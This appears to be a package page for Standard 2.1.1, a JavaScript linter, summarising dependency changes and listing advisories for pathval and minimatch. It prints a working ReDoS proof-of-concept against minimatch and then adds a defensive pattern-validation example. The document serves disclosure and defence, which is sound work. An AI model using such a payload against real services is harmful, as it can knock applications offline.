Standard version 2.1.1 is a minor patch release following closely on the heels of version 2.1.0. Both are iterations of the popular JavaScript Standard Style linter, designed to automatically format and enforce a consistent code style across JavaScript projects. Examining the package data reveals the key changes between the two versions. Version 2.1.1 adds extend.js and run-parallel as devDependencies, neither of which is present in version 2.1.0. For developers, this likely signifies internal improvements to the development workflow, testing, or build process of the Standard package itself; these dependencies would plausibly be used for tasks such as merging configurations or running tests in parallel.
Both 2.1.0 and 2.1.1 share identical core dependencies, including the linters eslint and jshint, the file-matching utilities glob and minimatch, and other packages used for code analysis and manipulation. This means the core style-checking and enforcement functionality is unchanged between the two releases. The patch introduces no breaking changes to the API or basic usage, easing the upgrade path for existing Standard users. Developers can upgrade to 2.1.1 to benefit from potential bug fixes or optimized tooling without adjusting their existing configurations. The updates streamline the development experience and keep the build process efficient, while maintaining the core style-checking functionality.
All vulnerabilities related to version 2.1.1 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of the pathval package below 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// pattern built from a long run of escape characters, as in the advisory's PoC
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update minimatch to version 3.0.2 or later.
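An added example, not code from the minimatch advisory or from the Standard project: a validation step a caller can place in front of minimatch(path, pattern) when the pattern comes from user input, so that a pattern shaped like the proof of concept above is rejected before it reaches the matcher. The length and escape-run limits, validateGlobPattern and safeMatch are assumptions chosen for illustration; upgrading minimatch remains the actual fix.

```javascript
// Assumed limits for patterns accepted from untrusted input (not from the advisory).
const MAX_PATTERN_LENGTH = 1024;   // assumed upper bound on a glob pattern's length
const MAX_ESCAPE_RUN = 16;         // assumed longest run of "\" characters accepted

// Returns { ok: true } or { ok: false, reason } for a candidate glob pattern.
function validateGlobPattern(pattern) {
  if (typeof pattern !== 'string') {
    return { ok: false, reason: 'pattern must be a string' };
  }
  if (pattern.length > MAX_PATTERN_LENGTH) {
    return { ok: false, reason: 'pattern too long' };
  }
  // The advisory's PoC is "[!" followed by a million backslashes: a long run of
  // escape characters is the shape that drives the vulnerable regex into backtracking.
  let run = 0;
  for (const ch of pattern) {
    run = ch === '\\' ? run + 1 : 0;
    if (run > MAX_ESCAPE_RUN) {
      return { ok: false, reason: 'excessive escape run' };
    }
  }
  return { ok: true };
}

// Wraps any (path, pattern) => boolean matcher (e.g. minimatch) behind the check.
// The matcher is injected so this file runs without minimatch installed.
function safeMatch(matchFn, path, pattern) {
  const verdict = validateGlobPattern(pattern);
  if (!verdict.ok) {
    throw new Error('rejected glob pattern: ' + verdict.reason);
  }
  return matchFn(path, pattern);
}

// Constructed demonstration: a stub matcher stands in for minimatch.
const stubMatcher = (path, pattern) => pattern === '*' || path === pattern;
const pathological = '[!' + '\\'.repeat(1000000) + 'A';

console.log(safeMatch(stubMatcher, 'foo', '*'));   // true
try {
  safeMatch(stubMatcher, 'foo', pathological);
} catch (e) {
  console.log(e.message);                          // rejected glob pattern: pattern too long
}
```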
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.